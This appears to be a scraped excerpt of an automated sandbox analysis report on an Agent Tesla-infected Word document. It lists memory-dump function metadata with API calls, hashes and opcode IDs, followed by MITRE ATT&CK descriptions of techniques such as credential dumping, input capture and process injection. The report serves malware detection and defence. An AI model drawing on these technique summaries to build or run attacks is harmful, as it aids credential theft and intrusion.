Instruction Fuzzy Hash: EF325474A14269CFCB24EF30C98879DB7BAAF88305F6084E9D50AA7351DB749E81CF45

Uniqueness

Uniqueness Score: -1.00%

Function 002E9821, Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 500COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 002E999E

Strings

,, xrefs: 002EA74F

Memory Dump Source

Source File: 00000007.00000002.2403787352.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID: ,
API String ID: 6842923-4120420056
Opcode ID: 0bffb4caa24b9cfc94583a9285f93ace536d3adf55c9a8b5143da567e7de1c89
Instruction ID: ad76801fb5ae3e19ee2601342c8754c6af25e5c516867d1a03a0772ca28521c4
Opcode Fuzzy Hash: 0bffb4caa24b9cfc94583a9285f93ace536d3adf55c9a8b5143da567e7de1c89
Instruction Fuzzy Hash: A0325474A14269CFCB24EF30C98879DB7BAAF88305F6084E9D50AA7351DB749E81CF45

Uniqueness

Uniqueness Score: -1.00%

Function 002E9866, Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 493COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 002E999E

Strings

,, xrefs: 002EA74F

Memory Dump Source

Source File: 00000007.00000002.2403787352.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID: ,
API String ID: 6842923-4120420056
Opcode ID: 5de9ef374e197d08338f87be2894a69b2565898bc2fdd3b26d5e57f8621af652
Instruction ID: 333e4250143f29673230e60539d67008fe6854cf3c8987fc4c67f6ae1d1c346e
Opcode Fuzzy Hash: 5de9ef374e197d08338f87be2894a69b2565898bc2fdd3b26d5e57f8621af652
Instruction Fuzzy Hash: 14225474A14269CFCB24EF30C98879DB7BAAF88305F6084E9D50AA7351DB749E81CF45

Uniqueness

Uniqueness Score: -1.00%

Function 002E98AB, Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 486COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 002E999E

Strings

,, xrefs: 002EA74F

Memory Dump Source

Source File: 00000007.00000002.2403787352.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID: ,
API String ID: 6842923-4120420056
Opcode ID: 0b1fb6c48210da4e99561512f17dba52c7c8aa34de0d62814c61cf7d44d0743c
Instruction ID: 919ee5566054403e3db48440e7f7eeda267682b064a5c33c9c52a78f1e8261d7
Opcode Fuzzy Hash: 0b1fb6c48210da4e99561512f17dba52c7c8aa34de0d62814c61cf7d44d0743c
Instruction Fuzzy Hash: 5E225474A10269CFCB24EF20C99879DB7BABF88305F6084E9D50AA7351DB749E81CF45

Uniqueness

Uniqueness Score: -1.00%

Function 002E98F0, Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 479COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 002E999E

Strings

,, xrefs: 002EA74F

Memory Dump Source

Source File: 00000007.00000002.2403787352.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID: ,
API String ID: 6842923-4120420056
Opcode ID: 138956ee53c7c547f38486888a836179b78a9c56978356926e25879b1063af42
Instruction ID: 1dd36e2969d6b56de78907f8af2c1567068a3767a1c649440d5b55ee3d91d862
Opcode Fuzzy Hash: 138956ee53c7c547f38486888a836179b78a9c56978356926e25879b1063af42
Instruction Fuzzy Hash: AA226474A10268CFCB24EF30C99879DB7BAAF88305F6084E9D50AA7351DB749E81CF45

Uniqueness

Uniqueness Score: -1.00%

Function 002E9935, Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 472COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 002E999E

Strings

,, xrefs: 002EA74F

Memory Dump Source

Source File: 00000007.00000002.2403787352.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID: ,
API String ID: 6842923-4120420056
Opcode ID: 98d3dba338dc7e9198983a61bc6b735bbc344cf7fd256b11f0df6d08dde23bbc
Instruction ID: 089cac70ed9bbb108b58245095f0672cd236cd204a4fc06adb773ad333b6dcd0
Opcode Fuzzy Hash: 98d3dba338dc7e9198983a61bc6b735bbc344cf7fd256b11f0df6d08dde23bbc
Instruction Fuzzy Hash: 0D225574A54268CFCB24EF30C89879DB7BAAF88305F6084E9D50AA7351DB749E81CF45

Uniqueness

Uniqueness Score: -1.00%

Function 002E997A, Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 465COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 002E999E

Strings

,, xrefs: 002EA74F

Memory Dump Source

Source File: 00000007.00000002.2403787352.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID: ,
API String ID: 6842923-4120420056
Opcode ID: 2f0844bd349a0cef77c344f87f0136802be8d7a56de3adc85ce135193651f8be
Instruction ID: 6de609946f1e0183b2f3f1de8d1d3f8b05d45fb4b0664f0c4aaf3a326b772656
Opcode Fuzzy Hash: 2f0844bd349a0cef77c344f87f0136802be8d7a56de3adc85ce135193651f8be
Instruction Fuzzy Hash: 83225574A50268CFCB24EF30C99879DB7BAAF88305F6084E9D50AA7351DB749E81CF45

Uniqueness

Uniqueness Score: -1.00%

Function 009E959C, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 88registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 009EE7C9

Strings

lVN, xrefs: 009E959C

Memory Dump Source

Source File: 00000007.00000002.2404097925.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: false

Similarity

API ID: QueryValue
String ID: lVN
API String ID: 3660427363-3272178963
Opcode ID: 4ab49ad85da79a5fcd378edc14ec47f2672c95c47657881cdf0c05ff9d2918cc
Instruction ID: e8658a5d8e6fd53f2f842ef9678c2598bb48893959042298aa566be3dd076d18
Opcode Fuzzy Hash: 4ab49ad85da79a5fcd378edc14ec47f2672c95c47657881cdf0c05ff9d2918cc
Instruction Fuzzy Hash: 3931D0B1D002589FCB21CF9AD884A9EFFF5AF48714F65842AE818AB350D7759D05CF90

Uniqueness

Uniqueness Score: -1.00%

Function 009EE706, Relevance: 1.6, APIs: 1, Instructions: 88registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 009EE7C9

Memory Dump Source

Source File: 00000007.00000002.2404097925.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 83c6350c2bd768496116b0d2d2ff06dbf53a47018f263d08c6e3d268f6b9dfdf
Instruction ID: 605164c1235b6744b0321529253f5780535ab48d4fda457462a67507b05c89a8
Opcode Fuzzy Hash: 83c6350c2bd768496116b0d2d2ff06dbf53a47018f263d08c6e3d268f6b9dfdf
Instruction Fuzzy Hash: 4431D0B1D002589FCB21CF9AD884A9EFFF5AF48704F25842AE818AB350D7719905CF90

Uniqueness

Uniqueness Score: -1.00%

Function 007704A0, Relevance: 1.6, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

SetWindowsHookExW.USER32(?,00000000,?,?), ref: 00770523

Memory Dump Source

Source File: 00000007.00000002.2404055907.0000000000770000.00000040.00000001.sdmp, Offset: 00770000, based on PE: false

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: fb521233beb9e75028e564d1c2d71f55ab387c506afd6f669a76cca4a01b5b1c
Instruction ID: 5fffd0cd02a542c79b894e548227aa1e980d2b3a97b8a5ab65806124cca09cb5
Opcode Fuzzy Hash: fb521233beb9e75028e564d1c2d71f55ab387c506afd6f669a76cca4a01b5b1c
Instruction Fuzzy Hash: E22134B19042488FCB10CFA9D844BEEFBF5EB88314F14882AD459A3350CB74A941CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 007704A8, Relevance: 1.6, APIs: 1, Instructions: 57COMMON

Download Yara Rule

APIs

SetWindowsHookExW.USER32(?,00000000,?,?), ref: 00770523

Memory Dump Source

Source File: 00000007.00000002.2404055907.0000000000770000.00000040.00000001.sdmp, Offset: 00770000, based on PE: false

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: 5ba775fcfd59f148749e940045bcaba1c4d3b44d8745b12ff73b1443c5af3d5c
Instruction ID: 8d0ccfd703368d912ad7d46fc1d68d3d2756ecb112fc7bf3075bc5f18b3bf87b
Opcode Fuzzy Hash: 5ba775fcfd59f148749e940045bcaba1c4d3b44d8745b12ff73b1443c5af3d5c
Instruction Fuzzy Hash: 2321E3B19002099FCB14CF99D844BEEFBF5EB89314F14882AE459A7350CB74A955CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 001BD48C, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2403679259.00000000001BD000.00000040.00000001.sdmp, Offset: 001BD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 625b65010ceffbfe8ffb9cea822291b4e36617c87ecb40c7038b35891eccdd28
Instruction ID: 9dc9dce4cb0461d285db308c61357371b0e874819ab27205fd613fe5205ddd9f
Opcode Fuzzy Hash: 625b65010ceffbfe8ffb9cea822291b4e36617c87ecb40c7038b35891eccdd28
Instruction Fuzzy Hash: 1F213775200204DFCB19DF10F9C0BA6BFB6FB98328F24C569E8054B206D336E856CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 001BD578, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2403679259.00000000001BD000.00000040.00000001.sdmp, Offset: 001BD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: caa043697d4e56f16003d77405d3c7f1f26040eb9655690fc45741f20fa88e32
Instruction ID: 403d8baf6eefbd4251987f035516b01f0e21310d55582509c32cf3c43173f6c3
Opcode Fuzzy Hash: caa043697d4e56f16003d77405d3c7f1f26040eb9655690fc45741f20fa88e32
Instruction Fuzzy Hash: CD214975500204DFCB19CF50E9C4F96BF75FB98318F348569E8094B246D336E856CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 001CD01C, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2403692862.00000000001CD000.00000040.00000001.sdmp, Offset: 001CD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd9cf3096b6b5b690d70ddca7433205b02a2fcb4de56d10707355aae7a7c349b
Instruction ID: 9f7f7364c6662e34eaa1b225938ea2a00ba29d92c2ba432bde32506ab6ef9948
Opcode Fuzzy Hash: cd9cf3096b6b5b690d70ddca7433205b02a2fcb4de56d10707355aae7a7c349b
Instruction Fuzzy Hash: EC21D375604244DFCB14CF28E584F16BBA5EB94314F24C9BDE8094B246C336D867CAA1

Uniqueness

Uniqueness Score: -1.00%

Function 001CE674, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2403692862.00000000001CD000.00000040.00000001.sdmp, Offset: 001CD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf417991e418cfc8b87015faa3d6d0741f01afed663d41d005521cb121cd10b9
Instruction ID: 1d0ce918384f7198b98b91f1fe663ec2078b2cafea4a6f2baadea203a87b78e7
Opcode Fuzzy Hash: bf417991e418cfc8b87015faa3d6d0741f01afed663d41d005521cb121cd10b9
Instruction Fuzzy Hash: AB21F275600344EFCB04CF60D9C4F26BBA5FBA8314F24C9ADE8494B242C336E856CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 001CD006, Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2403692862.00000000001CD000.00000040.00000001.sdmp, Offset: 001CD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41e87487fbca2f8cba46e46e0549650a591e1d537a18e43563e37a8eb41ae3fc
Instruction ID: a2648786d737ba04a7f5c289c2602ec26f95fbdc6a3ef57a2fe500f51e285714
Opcode Fuzzy Hash: 41e87487fbca2f8cba46e46e0549650a591e1d537a18e43563e37a8eb41ae3fc
Instruction Fuzzy Hash: B32192755083809FCB02CF14E994B15BF71EB56314F28C5EAD8498F257C33AD816CB62

Uniqueness

Uniqueness Score: -1.00%

Function 001BD487, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2403679259.00000000001BD000.00000040.00000001.sdmp, Offset: 001BD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6286a3279e69299413871d4e25d69dc89c120fe7ccd7aa2d64d44a89ce99abad
Instruction ID: 6f74e140b387ae2d704c8eb1011aec9307531b1bf34e6e61db973fd685af7503
Opcode Fuzzy Hash: 6286a3279e69299413871d4e25d69dc89c120fe7ccd7aa2d64d44a89ce99abad
Instruction Fuzzy Hash: 2611D076504280CFCB16CF10E9C4B56BF72FB94324F24C6A9D8094B216C33AD85ACBA2

Uniqueness

Uniqueness Score: -1.00%

Function 001BD573, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2403679259.00000000001BD000.00000040.00000001.sdmp, Offset: 001BD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6286a3279e69299413871d4e25d69dc89c120fe7ccd7aa2d64d44a89ce99abad
Instruction ID: 227a47aca6e70728600c7bb76c0102d83875d53f71c50b7e63f6090316b03095
Opcode Fuzzy Hash: 6286a3279e69299413871d4e25d69dc89c120fe7ccd7aa2d64d44a89ce99abad
Instruction Fuzzy Hash: 2411E676504280CFCF16CF14E5C4B56BF71FB95324F24C5A9D8094B216D336D856CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 001CE66F, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2403692862.00000000001CD000.00000040.00000001.sdmp, Offset: 001CD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea8ce52f3b615b8e449be01d93b9393bbd7ecd0d493f38c7c44483db944f7c15
Instruction ID: c4a62d67173bbfc92c2cb40fcba90a16313d0c2c3cdeb15c76c85c4a6c846c92
Opcode Fuzzy Hash: ea8ce52f3b615b8e449be01d93b9393bbd7ecd0d493f38c7c44483db944f7c15
Instruction Fuzzy Hash: EC118B79504380DFCB05CF10D5C4B15BBA2FB95314F28C6ADD8494B656C33AE85ACFA1

Uniqueness

Uniqueness Score: -1.00%

Function 001BD795, Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2403679259.00000000001BD000.00000040.00000001.sdmp, Offset: 001BD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a284d7a46a247425a8796e296ab9727b1e94c768012981ce3b3bb8424259990b
Instruction ID: a651b459a3fd4de56be6fd9dbb0fcc4a7dc514b578746b03c1f3248f9ce418f7
Opcode Fuzzy Hash: a284d7a46a247425a8796e296ab9727b1e94c768012981ce3b3bb8424259990b
Instruction Fuzzy Hash: 1B01F731004344DBD7288B65D988BE7BFDCEF51728F28845AE9485B286D7389840C6B1

Uniqueness

Uniqueness Score: -1.00%

Function 001BD794, Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2403679259.00000000001BD000.00000040.00000001.sdmp, Offset: 001BD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: abe6c7dd75960b846fc604d5fe8e747ba1db8b0c9a3323ddc0e3c5847c2feca8
Instruction ID: 487226deaff52d93bb704ab96b3a88180f3fd9d8767efffc1000ff2c6d291ca8
Opcode Fuzzy Hash: abe6c7dd75960b846fc604d5fe8e747ba1db8b0c9a3323ddc0e3c5847c2feca8
Instruction Fuzzy Hash: 76F062714047849BE7248E15D888BA2FFD8EF91724F28C55AED485B286D3789C44CBB1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00404159, Relevance: .4, Instructions: 417COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2403848274.0000000000402000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2403843175.0000000000400000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eabfdf676affe3fadd9dd2cb5f8f0591f2cf79ec057d16f3eeb74ecf2f4147c8
Instruction ID: 5766b07361c85bad84b311c54480103a51e83e9a5066bfc03f3ac363bdd652b5
Opcode Fuzzy Hash: eabfdf676affe3fadd9dd2cb5f8f0591f2cf79ec057d16f3eeb74ecf2f4147c8
Instruction Fuzzy Hash: 820247A104E3D64EC713DBB5187AA92BF71AF63314F5E95DBC0C29B093F6212819C366

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report INQUIRY_RFQ_20210208.doc

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: Agenttesla

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Exploits:

Compliance:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static RTF Info

Objects

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

SMTP Packets

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre